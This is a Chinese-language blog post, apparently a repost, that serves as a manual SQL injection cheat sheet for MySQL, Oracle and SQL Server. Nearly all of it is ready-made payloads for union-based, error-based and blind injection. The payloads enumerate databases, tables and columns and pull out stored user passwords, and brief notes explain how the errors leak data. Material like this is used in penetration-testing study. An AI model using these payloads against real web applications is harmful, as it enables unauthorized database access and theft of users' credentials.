zoukankan      html  css  js  c++  java
  • SQL手工注入方法

    https://mp.weixin.qq.com/s/RLdBCOUkcLpRoniacOP-Kw

    1、Mysql 手工注入

    联合注入

    ?id=1' order by 4--+

    ?id=0' union select 1,2,3,database()--+

    ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+

    ?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+

    #group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name

    ?id=0' union select 1,2,3,group_concat(password) from users --+

    #group_concat 可替换为 concat_ws(',',id,users,password )

    ?id=0' union select 1,2,3,password from users limit 0,1--+

    报错注入

    1.floor()

    select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

    2.extractvalue()

    select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

    3.updatexml()

    select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

    4.geometrycollection()

    select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

    5.multipoint()

    select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

    6.polygon()

    select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

    7.multipolygon()

    select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

    8.linestring()

    select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

    9.multilinestring()

    select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

    10.exp()

    select * from test where id=1 and exp(~(select * from(select user())a));

    updatexml() 报错的原理:由于 updatexml 的第二个参数需要 Xpath 格式的字符串,以 ~ 开头的内容不是 xml

    格式的语法,concat() 函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。

    爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +

    爆表:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +

    爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +

    爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +

    #concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)

    这里需要注意的是它加了连接字符,导致数据中的 md5 只能爆出 31 位,这里可以用分割函数分割出来:

    substr(string string,num start,num length);

    #string为字符串,start为起始位置,length为长度

    ?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +

    盲注

    时间盲注

    ?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+

    ?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+

    布尔盲注

    ?id=1' and substr((select user()),1,1)='r' -- +

    ?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +

    #如果 IFNULL 第一个参数的表达式为 NULL,则返回第二个参数的备用值,不为 Null 则输出值

    ?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +

    #若所有的字符串均相同,STRCMP() 返回 0,若根据当前分类次序,第一个参数小于第二个,则返回 -1 ,其它情况返回 1

    Oracle 手工注入

    联合注入

    ?id=-1' union select user,null from dual--

    ?id=-1' union select version,null from v$instance--

    ?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--

    ?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--

    ?id=-1' union select username,passwd from users--

    ?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--

    报错注入

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--

    ?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--

    布尔盲注

    ?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--

    ?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--

    ?id=1' and ascii(substr(user,1,1))> 64-- #二分法

    时间盲注

    ?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

    ?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

    SQL server 手工注入

    联合注入

    ?id=-1' union select null,null--

    ?id=-1' union select @@servername, @@version--

    ?id=-1' union select db_name(),suser_sname()--

    ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--

    ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--

    ?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--

    ?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---

    ?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

    报错注入

    ?id=1' and 1=(select 1/@@servername)--

    ?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--

    盲注

    布尔盲注

    ?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--

    时间盲注

    ?id= 1';if(2>1) waitfor delay '0:0:5'--

    ?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay '0:0:2'--

  • 相关阅读:
    分页通信
    减少页面加载时间的方法
    config/index.js
    5.20 单词小记
    nginx启动报错(1113: No mapping for the Unicode character exists in the target multi-byte code page)
    Windows系统下hosts文件工作原理(转)
    5.19 英语单词小计
    mybatis sql语句转化
    (转) Java 静态代码块和非静态代码块
    5.18英语单词小记
  • 原文地址:https://www.cnblogs.com/bingtang123/p/12955530.html
Copyright © 2011-2022 走看看